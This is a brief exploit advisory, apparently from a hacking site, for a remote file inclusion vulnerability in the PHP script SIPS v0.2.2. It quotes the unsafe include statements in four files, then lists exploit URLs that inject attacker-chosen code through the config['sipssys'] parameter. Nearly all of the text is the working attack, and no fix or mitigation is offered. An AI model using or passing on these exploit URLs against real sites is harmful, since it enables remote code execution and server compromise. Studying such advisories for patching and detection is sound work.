/===============================================================================================================================================\ | | | [o] SIPS v0.2.2 Remote File Inclusion Vulnerability | | | | Software : SIPS v0.2.2 | | Vendor : http://www.phpscripts-fr.net/scripts/hosted/sips022.zip | | Author : Cru3l.b0y | | | Home : WwW.DeltaHacking.Net |===============================================================================================================================================| | | | [o] Vulnerable file | | | | search.php | | | | include $config["sipssys"] ."/code/news.inc.php"; | | | | readmore.php | | | | include $config["sipssys"] ."/code/news.inc.php"; | | | | index.php | | | | include $config["sipssys"] ."/code/news.inc.php"; | | include $config["sipssys"] ."/code/box.inc.php"; | | | | search/submit.php | | | | include $config["sipssys"] ."/code/search.inc.php"; | | | | | | | | [o] Exploit | | | | http://localhost/[path]/search.php?config["sipssys"]=[evilcode] | | http://localhost/[path]/readmore.php?config["sipssys"]=[evilcode] | | http://localhost/[path]/index.php?config["sipssys"]=[evilcode] | | http://localhost/[path]/search/submit.php?config["sipssys"]=[evilcode] | | |